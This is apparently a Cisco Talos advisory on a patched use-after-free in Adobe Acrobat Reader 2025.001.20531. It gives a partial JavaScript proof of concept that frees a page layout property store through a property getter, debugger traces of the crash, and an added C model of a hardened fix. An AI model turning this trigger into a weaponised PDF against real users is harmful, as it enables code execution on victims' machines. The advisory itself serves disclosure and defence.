Adobe Acrobat Reader Page Property Use-After-Free Vulnerability
Adobe Acrobat Reader 2025.001.20531 contains a use-after-free vulnerability that can lead to memory corruption and arbitrary code execution. An attacker can trigger it by tricking a user into opening a malicious PDF file. 2025-9-22 23:59:12 Author: talosintelligence.com

SUMMARY

A use-after-free vulnerability exists in the page property functionality of Adobe Acrobat Reader 2025.001.20531. A specially crafted Javascript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and could result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Adobe Acrobat Reader 2025.001.20531

PRODUCT URLS

Acrobat Reader - https://acrobat.adobe.com/us/en/acrobat/pdf-reader.html

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Adobe Acrobat Reader is one of the most popular and feature-rich PDF readers on the market. It has a large user base and is usually a default PDF reader on systems. It also integrates into web browsers as a plugin for rendering PDFs.

Adobe Acrobat Reader supports various page properties. A use-after-free vulnerability exists in the way Adobe Acrobat Reader processes one of these properties. The following proof-of-concept code illustrates it:

function main() {
[...]

    var tmp_annot = {page: 0, type: "Squiggly", point: [3,2,9,4], name: "AAA"};
    // the "type" getter runs while the annotation is being added
    Object.defineProperty(tmp_annot, "type", { get: fv_state });
    app.activeDocs[0].addAnnot(tmp_annot);

[...]

    app.activeDocs[0].pageNum = 2;
}

function fv_state() {
    app.activeDocs[0].viewState = {
      a: app.fs.backgroundColor["0"],
      b: app.activeDocs[0].getField('Text Field1')['submitName'],
      c: event.richValue,
      d: app.activeDocs[0].getField('List Box0')['rect']
    };
}

In this case, when the fv_state() function is called, it frees properties related to the AVPageLayoutEngine object. The use-after-free vulnerability occurs when the program later accesses this freed object without proper validation. We can observe the following in the debugger (with PageHeap enabled):

eax=04afce24 ebx=c1188e28 ecx=04afce2f edx=b11bcfd0 esi=6eb665e0 edi=c2c68f68
eip=6eb66cab esp=04afce08 ebp=04afce30 iopl=0         nv up ei ng nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200282
AcroRd32!DllCanUnloadNow+0x17ec8b:
6eb66cab e8f675e4ff      call    AcroRd32!AcroWinMainSandbox+0x3346 (6e9ae2a6) ;<----------- (1)
0:000> u 6EB66CA4
AcroRd32!DllCanUnloadNow+0x17ec84:
6eb66ca4 6a01            push    1
6eb66ca6 68e4020000      push    2E4h   ; <------------------------------------ (2)
6eb66cab e8f675e4ff      call    AcroRd32!AcroWinMainSandbox+0x3346 (6e9ae2a6)
6eb66cb0 59              pop     ecx
6eb66cb1 59              pop     ecx
6eb66cb2 8bc8            mov     ecx,eax
6eb66cb4 894df0          mov     dword ptr [ebp-10h],ecx
6eb66cb7 33c0            xor     eax,eax
0:000> p
eax=b8df2d18 ebx=c1188e28 ecx=00000001 edx=00000000 esi=6eb665e0 edi=c2c68f68
eip=6eb66cb0 esp=04afce08 ebp=04afce30 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
AcroRd32!DllCanUnloadNow+0x17ec90:
6eb66cb0 59              pop     ecx
0:000> dd eax      ;<----------------------------------- (3)
b8df2d18  00000000 00000000 00000000 00000000
b8df2d28  00000000 00000000 00000000 00000000
b8df2d38  00000000 00000000 00000000 00000000
b8df2d48  00000000 00000000 00000000 00000000
b8df2d58  00000000 00000000 00000000 00000000
b8df2d68  00000000 00000000 00000000 00000000
b8df2d78  00000000 00000000 00000000 00000000
b8df2d88  00000000 00000000 00000000 00000000


0:000> pc
eax=00000000 ebx=c1188e28 ecx=b8df2d18 edx=00000000 esi=6eb665e0 edi=c2c68f68
eip=6eb66cc0 esp=04afce10 ebp=04afce30 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200286
AcroRd32!DllCanUnloadNow+0x17eca0:
6eb66cc0 e82c000000      call    AcroRd32!DllCanUnloadNow+0x17ecd1 (6eb66cf1) ;<----------------------------------- (4)

At (1) above, a method is called which calls malloc to allocate an AVPageLayoutEngine object of size 0x2E4 (the value pushed at (2)). The freshly allocated AVPageLayoutEngine object is examined at (3). The method called at (4) initializes the AVPageLayoutEngine object.

0:000> g
Breakpoint 1 hit
eax=00000000 ebx=00000005 ecx=b8df2d80 edx=00000000 esi=b8df2d80 edi=00000000
eip=6eb676ae esp=04afcdac ebp=04afcdd0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
AcroRd32!DllCanUnloadNow+0x17f68e:
6eb676ae 6a20            push    20h  ; <-------------------------------- (5)
0:000> p
eax=00000000 ebx=00000005 ecx=b8df2d80 edx=00000000 esi=b8df2d80 edi=00000000
eip=6eb676b0 esp=04afcda8 ebp=04afcdd0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
AcroRd32!DllCanUnloadNow+0x17f690:
6eb676b0 897e08          mov     dword ptr [esi+8],edi ds:002b:b8df2d88=00000000
0:000> p
eax=00000000 ebx=00000005 ecx=b8df2d80 edx=00000000 esi=b8df2d80 edi=00000000
eip=6eb676b3 esp=04afcda8 ebp=04afcdd0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
AcroRd32!DllCanUnloadNow+0x17f693:
6eb676b3 e8ee6be4ff      call    AcroRd32!AcroWinMainSandbox+0x3346 (6e9ae2a6) ; <-------------------------------- (6)
0:000> p
eax=78fe8fe0 ebx=00000005 ecx=00000001 edx=00000000 esi=b8df2d80 edi=00000000
eip=6eb676b8 esp=04afcda8 ebp=04afcdd0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
AcroRd32!DllCanUnloadNow+0x17f698:
6eb676b8 59              pop     ecx
0:000> dd eax   ; <-------------------------------- (7)
78fe8fe0  00000000 00000000 00000000 00000000
78fe8ff0  00000000 00000000 00000000 00000000
78fe9000  ???????? ???????? ???????? ????????
78fe9010  ???????? ???????? ???????? ????????
78fe9020  ???????? ???????? ???????? ????????
78fe9030  ???????? ???????? ???????? ????????
78fe9040  ???????? ???????? ???????? ????????
78fe9050  ???????? ???????? ???????? ????????
0:000> pt
eax=b8df2d80 ebx=00000005 ecx=6eb676d9 edx=bf3dcfd8 esi=b8df2d18 edi=c2c68f68
eip=6eb676d9 esp=04afcdd4 ebp=04afcdf8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
AcroRd32!DllCanUnloadNow+0x17f6b9:
6eb676d9 c3              ret
0:000> dd b8df2d18 + 74        ; <-------------------------------- (8)
b8df2d8c  78fe8fe0 00000000 00000000 00000000
b8df2d9c  00000000 00000000 00000000 00000000
b8df2dac  00000000 00000000 00000000 00000000
b8df2dbc  00000000 00000000 00000000 00000000
b8df2dcc  00000000 00000000 00000000 00000000
b8df2ddc  00000000 00000000 00000000 00000000
b8df2dec  00000000 00000000 00000000 00000000
b8df2dfc  00000000 00000000 00000000 00000000

[...]

dd b8df2d18 + 74      ; <-------------------------------- (9)
b8df2d8c  f864afe0 707f3e14 00000001 00000002
b8df2d9c  f91aafe0 707f3e14 00000001 00000002
b8df2dac  f91acfe0 707f3e14 00000001 00000002
b8df2dbc  f68fcfe0 707f3e14 00000001 00000002
b8df2dcc  f68fefe0 707f3e14 00000001 00000002
b8df2ddc  f8c2afe0 707f3e14 00000001 00000002
b8df2dec  f6c92fe0 707f3e14 00000001 00000002
b8df2dfc  f8742fe0 707f3e14 00000001 00000001

The initialization method calls a method to create a type of property store object with a size of 0x20 bytes, as shown at (5). The method called at (6) allocates the vulnerable property store object, which can be seen after allocation at (7). Each property store object is written into the AVPageLayoutEngine structure starting at offset 0x74, with each subsequent property store placed 0x10 bytes after the previous one; the first entry can be seen at (8). The AVPageLayoutEngine object after all the property store objects have been written can be seen at (9). These objects may be allocated and updated multiple times, depending on the JavaScript code being executed. Eventually, one of the property store objects is used after it has been freed.

eax=3e14bf98 ebx=04afe684 ecx=b8df2d18 edx=00000000 esi=00000000 edi=04afe684
eip=6ebbe568 esp=04afd618 ebp=04afe690 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
AcroRd32!DllCanUnloadNow+0x1d6548:
6ebbe568 c744240400002041 mov     dword ptr [esp+4],41200000h ss:002b:04afd61c=048f4000
0:000> dd b8df2d18+74   ; <-------------------------------- (10)
b8df2d8c  f55aefe0 707f3e14 00000000 00000001
b8df2d9c  efc9cfe0 707f3e14 00000000 00000001
b8df2dac  f1adefe0 707f3e14 00000000 00000001
b8df2dbc  f55c6fe0 707f3e14 00000000 00000001
b8df2dcc  f396cfe0 707f3e14 00000000 00000001
b8df2ddc  f94d1230 707f3e14 00000000 00000001
b8df2dec  f94d1288 707f3e14 00000000 00000001
b8df2dfc  f94cc5e8 707f3e14 00000000 00000001
0:000> dd f55aefe0  ; <-------------------------------- (11)
f55aefe0  ???????? ???????? ???????? ????????
f55aeff0  ???????? ???????? ???????? ????????
f55af000  ???????? ???????? ???????? ????????
f55af010  ???????? ???????? ???????? ????????
f55af020  ???????? ???????? ???????? ????????
f55af030  ???????? ???????? ???????? ????????
f55af040  ???????? ???????? ???????? ????????
f55af050  ???????? ???????? ???????? ????????

0:000> pc
eax=3e14bf98 ebx=04afe684 ecx=b8df2d18 edx=00000000 esi=00000000 edi=04afe684
eip=6ebbe57a esp=04afd614 ebp=04afe690 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
AcroRd32!DllCanUnloadNow+0x1d655a:
6ebbe57a e838040000      call    AcroRd32!DllCanUnloadNow+0x1d6997 (6ebbe9b7)
0:000> t
eax=3e14bf98 ebx=04afe684 ecx=b8df2d18 edx=00000000 esi=00000000 edi=04afe684
eip=6ebbe9b7 esp=04afd610 ebp=04afe690 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
AcroRd32!DllCanUnloadNow+0x1d6997:
6ebbe9b7 55              push    ebp
0:000> pc
eax=04afd618 ebx=00000001 ecx=b8df2d80 edx=00000000 esi=00000001 edi=b8df2d18
eip=6ebbe9d2 esp=04afd5e0 ebp=04afd60c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
AcroRd32!DllCanUnloadNow+0x1d69b2:
6ebbe9d2 e83a020000      call    AcroRd32!DllCanUnloadNow+0x1d6bf1 (6ebbec11)

At (10), we can examine the AVPageLayoutEngine buffer. The first property store object has been freed, as shown at (11). The freed buffer is later used without any validation. This can be observed in a debugger at the time of the crash:

0:000> p
(263c.1968): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=b8df2d80 ecx=f55aefe0 edx=00000000 esi=f55aefe0 edi=00000000
eip=6eb09230 esp=04afd574 ebp=04afd57c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
AcroRd32!DllCanUnloadNow+0x121210:
6eb09230 8b4e04          mov     ecx,dword ptr [esi+4] ds:002b:f55aefe4=???????? ; <-------------------------------- (12)

0:000> !ext.heap -p -a f55aefe4
    address f55aefe4 found in
    _DPH_HEAP_ROOT @ 9441000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                   f54d1138:         f55ae000             2000
    72d4ab02 verifier!AVrfDebugPageHeapFree+0x000000c2
    77aafa36 ntdll!RtlDebugFreeHeap+0x0000003e
    77a14016 ntdll!RtlpFreeHeap+0x000000d6
    77a581fd ntdll!RtlpFreeHeapInternal+0x00000783
    77a13ee6 ntdll!RtlFreeHeap+0x00000046
    77163c9b ucrtbase!_free_base+0x0000001b
    77163c68 ucrtbase!free+0x00000018
    6e9b02e9 AcroRd32!AcroWinMainSandbox+0x00005389
    6eb67ce4 AcroRd32!DllCanUnloadNow+0x0017fcc4
    6ea18f8e AcroRd32!DllCanUnloadNow+0x00030f6e
    6f0fa6c4 AcroRd32!ixVectorNextHit+0x00181f84
    6ebbe9d7 AcroRd32!DllCanUnloadNow+0x001d69b7
    6ebbe3a0 AcroRd32!DllCanUnloadNow+0x001d6380
    6eb75d20 AcroRd32!DllCanUnloadNow+0x0018dd00
    6ebbdc49 AcroRd32!DllCanUnloadNow+0x001d5c29
    6ebbd3f7 AcroRd32!DllCanUnloadNow+0x001d53d7
    6ebbc7cf AcroRd32!DllCanUnloadNow+0x001d47af
    6f6a29cf AcroRd32!AIDE::PixelPartInfo::operator=+0x00293a8f
    fa26f9c8 EScript!PlugInMain+0x000553c8
    fa22618c EScript!PlugInMain+0x0000bb8c
    fa116300 EScript!mozilla::HashBytes+0x000395f0
    fa0eadad EScript!mozilla::HashBytes+0x0000e09d
    fa0ea5ce EScript!mozilla::HashBytes+0x0000d8be
    fa1110cc EScript!mozilla::HashBytes+0x000343bc
    fa10ae63 EScript!mozilla::HashBytes+0x0002e153
    fa107c9b EScript!mozilla::HashBytes+0x0002af8b
    fa107b12 EScript!mozilla::HashBytes+0x0002ae02
    fa107a6d EScript!mozilla::HashBytes+0x0002ad5d
    fa0ec8a3 EScript!mozilla::HashBytes+0x0000fb93
    fa125a8d EScript!mozilla::HashBytes+0x00048d7d


0:000> u
AcroRd32!DllCanUnloadNow+0x121210:
6eb09230 8b4e04          mov     ecx,dword ptr [esi+4]
6eb09233 8b4618          mov     eax,dword ptr [esi+18h]
6eb09236 d3ea            shr     edx,cl
6eb09238 8b4e14          mov     ecx,dword ptr [esi+14h]
6eb0923b 2bc1            sub     eax,ecx
6eb0923d c1f802          sar     eax,2
6eb09240 3bd0            cmp     edx,eax
6eb09242 7318            jae     AcroRd32!DllCanUnloadNow+0x12123c (6eb0925c)

0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 04afd57c 6ebbef0e     00000000 00000000 00000001 AcroRd32!DllCanUnloadNow+0x121210
01 04afd594 6ebbec97     00000001 00000001 04afd618 AcroRd32!DllCanUnloadNow+0x1d6eee
02 04afd5d8 6ebbe9d7     00000001 00000001 04afd618 AcroRd32!DllCanUnloadNow+0x1d6c77
03 04afd60c 6ebbe57f     00000001 41200000 41200000 AcroRd32!DllCanUnloadNow+0x1d69b7
04 04afe690 6eb75d20     00000001 00000000 00000001 AcroRd32!DllCanUnloadNow+0x1d655f
05 04afe6ac 6ebbdc49     00000001 f8a4e526 c1188e28 AcroRd32!DllCanUnloadNow+0x18dd00
06 04afe73c 6ebbd3f7     00000001 00000001 c1188e28 AcroRd32!DllCanUnloadNow+0x1d5c29
07 04afe750 6ebbc7cf     c1188e28 00000001 f8a4e5a6 AcroRd32!DllCanUnloadNow+0x1d53d7
08 04afe7bc 6f6a29cf     00000002 00000002 6f6a29b0 AcroRd32!DllCanUnloadNow+0x1d47af
09 04afe7d0 fa26f9c8     c1188e28 00000002 5a29b548 AcroRd32!AIDE::PixelPartInfo::operator=+0x293a8f
0a 04afe808 fa22618c     f9905a60 fda683d0 fea2e638 EScript!PlugInMain+0x553c8
0b 04afe874 fa116300     fa678000 04afe9dc 04afe894 EScript!PlugInMain+0xbb8c
0c 04afe8bc fa0eadad     fa678000 04afe9dc 04afe9dc EScript!mozilla::HashBytes+0x395f0
0d 04afe908 fa0ea5ce     fa678000 04afe9dc 04afe9dc EScript!mozilla::HashBytes+0xe09d
0e 04afe9b4 fa1110cc     fa678000 04afe9dc 04afe9dc EScript!mozilla::HashBytes+0xd8be
0f 04afe9f4 fa10ae63     fa678000 04afea38 fb8b9e81 EScript!mozilla::HashBytes+0x343bc
10 04afebcc fa107c9b     00000000 04afebc8 04afebd4 EScript!mozilla::HashBytes+0x2e153
11 04afebf8 fa107b12     fa678000 04afec08 fa2fa194 EScript!mozilla::HashBytes+0x2af8b
12 04afec44 fa107a6d     fa678000 04afecbc fab29a10 EScript!mozilla::HashBytes+0x2ae02
13 04afec90 fa0ec8a3     fa678000 04afecbc fab29a10 EScript!mozilla::HashBytes+0x2ad5d
14 04afece0 fa125a8d     fa678000 04afed28 00000000 EScript!mozilla::HashBytes+0xfb93
15 04afed64 fa235e4b     fa678000 fab29a10 fa6b52d0 EScript!mozilla::HashBytes+0x48d7d
16 04afef18 fa235ab3     f9381700 f957d848 f9381748 EScript!PlugInMain+0x1b84b
17 04afef64 fa234893     f94ba758 f9905a60 f9e88550 EScript!PlugInMain+0x1b4b3
18 04aff004 fa29d4d1     b564cb58 f9905a60 f949ae30 EScript!PlugInMain+0x1a293
19 04aff048 6ea6eca5     f97404c0 f8a4f2ba 23098f50 EScript!PlugInMain+0x82ed1
1a 04aff0a0 6ea6e2b4     00005e0f f8a4f322 23098f10 AcroRd32!DllCanUnloadNow+0x86c85
1b 04aff138 6ea6ded6     3e165fc8 00005e0f 6ea6dcb7 AcroRd32!DllCanUnloadNow+0x86294
1c 04aff194 6e9ba2dd     000004d3 00000000 00000113 AcroRd32!DllCanUnloadNow+0x85eb6
1d 04aff1b0 7588145b     004805c0 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0xf37d
1e 04aff1dc 75877b4a     6e9b9e90 004805c0 00000113 USER32!_InternalCallWinProc+0x2b
1f 04aff2c4 758763f0     6e9b9e90 00000000 00000113 USER32!UserCallWinProcCheckWow+0x33a
20 04aff340 75875f20     00000013 04aff364 6ea6d716 USER32!DispatchMessageWorker+0x4c0
21 04aff34c 6ea6d716     04aff380 3e14fd80 3e14fd80 USER32!DispatchMessageW+0x10
22 04aff364 6ea6d0be     04aff380 f8a4f1c2 3e14fd80 AcroRd32!DllCanUnloadNow+0x856f6
23 04aff3d8 6ea6ced4     f8a4f60a 3e14fd80 00000000 AcroRd32!DllCanUnloadNow+0x8509e
24 04aff410 6e9abd17     f8a4f69e 23216ff8 00000000 AcroRd32!DllCanUnloadNow+0x84eb4
25 04aff484 6e9ab0ec     6e590000 001b0000 23216ff8 AcroRd32!AcroWinMainSandbox+0xdb7
26 04aff8a8 0038a6a5     6e590000 001b0000 23216ff8 AcroRd32!AcroWinMainSandbox+0x18c
27 04affcf8 00409f9a     001b0000 00000000 09460018 AcroRd32_exe!CreateCoreWebview2EnvironmentSandbox+0x10d995
28 04affd44 75affcc9     048f1000 75affcb0 04affdb0 AcroRd32_exe!AcroRd32IsBrokerProcess+0x1bbda
29 04affd54 77a382ae     048f1000 273d0661 00000000 KERNEL32!BaseThreadInitThunk+0x19
2a 04affdb0 77a3827e     ffffffff 77a59345 00000000 ntdll!__RtlUserThreadStart+0x2f
2b 04affdc0 00000000     00386610 048f1000 00000000 ntdll!_RtlUserThreadStart+0x1b

Depending on the memory layout of the process, it may be possible to abuse this vulnerability for arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
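The object lifetime problem the analysis above describes (a property store released from inside a script callback while the engine still holds, and later dereferences, its table entry), as an added C model written for this page. It is not Adobe's code or part of the advisory, and the names layout_engine, property_store, script_callback, render, page_operation and the instrumented pool are all assumptions. The model contrasts the vulnerable pattern with a hardened one that defers a release requested mid-operation and clears the table entry, and it uses a small PageHeap-like pool so the stale read is reported rather than left undefined:

```c
#include <stdio.h>
#include <string.h>

/* Constructed model of the lifetime problem described in the advisory. It is
 * illustrative code, not Adobe's, and every name in it is assumed: a layout engine
 * owns a table of property stores, and a script callback can release one mid-operation. */

#define NUM_STORES 8
#define POOL_SIZE  (NUM_STORES * 2)

typedef struct { int shift; } property_store;  /* stands in for the field read at +4 */
/* Instrumented pool standing in for PageHeap: it tracks whether each block is
 * live, so a read of freed memory is reported instead of being undefined. */
static struct { property_store obj; int live; } pool[POOL_SIZE];

static int pool_index(const property_store *p) {
    for (int i = 0; i < POOL_SIZE; i++)
        if (&pool[i].obj == p) return i;
    return -1;
}

static property_store *pool_alloc(void) {
    for (int i = 0; i < POOL_SIZE; i++)
        if (!pool[i].live) { pool[i].live = 1; pool[i].obj.shift = 0; return &pool[i].obj; }
    return NULL;
}

static void pool_free(property_store *p) {
    int i = pool_index(p);
    if (i >= 0) { pool[i].live = 0; memset(p, 0xdd, sizeof *p); }  /* poison the block */
}

typedef struct {
    property_store *stores[NUM_STORES];
    int in_use;           /* reentrancy guard used by the hardened variant */
    int pending_release;  /* slot whose release was deferred, or -1 */
} layout_engine;

static void engine_init(layout_engine *e) {
    memset(e, 0, sizeof *e);
    e->pending_release = -1;
    for (int i = 0; i < NUM_STORES; i++) {
        e->stores[i] = pool_alloc();
        e->stores[i]->shift = i + 1;
    }
}

enum { RENDER_OK = 0, RENDER_UAF_DETECTED = -1, RENDER_SLOT_MISSING = -2 };

/* Script callback releasing a store. Vulnerable: free it and leave the table entry
 * dangling. Hardened: defer while the engine is busy, and clear the entry on release. */
static void script_callback(layout_engine *e, int idx, int hardened) {
    if (!hardened) { pool_free(e->stores[idx]); return; }
    if (e->in_use) { e->pending_release = idx; return; }
    pool_free(e->stores[idx]);
    e->stores[idx] = NULL;
}

/* Consumer of a store. Only the hardened variant checks the slot; the liveness
 * test after it is the pool's instrumentation, i.e. where PageHeap would fault. */
static int render(layout_engine *e, int idx, int hardened, int *out) {
    property_store *s = e->stores[idx];
    if (hardened && s == NULL) return RENDER_SLOT_MISSING;
    int i = pool_index(s);
    if (i < 0 || !pool[i].live) return RENDER_UAF_DETECTED;
    *out = 1 << s->shift;
    return RENDER_OK;
}

/* One page operation on slot 0: mark the engine busy, let a script callback
 * fire in the middle (as the PoC's getter does), then continue rendering. */
static int page_operation(layout_engine *e, int hardened, int *out) {
    e->in_use = 1;
    script_callback(e, 0, hardened);
    int rc = render(e, 0, hardened, out);
    e->in_use = 0;
    if (e->pending_release >= 0) {  /* engine idle again: apply the deferred release */
        script_callback(e, e->pending_release, 1);
        e->pending_release = -1;
    }
    return rc;
}

/* Runs one scenario on a fresh pool: returns the value rendered during the
 * operation (or its error code) and stores a later render of slot 0 in *later. */
static int scenario(int hardened, int *later) {
    layout_engine e; int v = 0;
    memset(pool, 0, sizeof pool);
    engine_init(&e);
    int rc = page_operation(&e, hardened, &v);
    *later = render(&e, 0, hardened, &v);
    return rc == RENDER_OK ? v : rc;
}

int main(void) {
    int later, rc = scenario(0, &later);
    printf("vulnerable: rc %d, later %d\n", rc, later);
    rc = scenario(1, &later); printf("hardened: value %d, later %d\n", rc, later);
}
```

Build with any C99 compiler and run it: the vulnerable scenario reports RENDER_UAF_DETECTED at the point where the debugger session above shows the access violation, while the hardened one renders slot 0 normally, applies the release once the engine is idle, and then refuses to touch the cleared slot. The reentrancy guard is the part that matters for script-driven readers: a property getter can run arbitrary document script inside an engine operation, so ownership changes requested from script must not take effect while the engine's own references are still live.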

TIMELINE

2025-07-14 - Vendor Disclosure
2025-09-09 - Vendor Patch Release
2025-09-23 - Public Release

Discovered by KPC of Cisco Talos.


Source: https://talosintelligence.com/vulnerability_reports/TALOS-2025-2222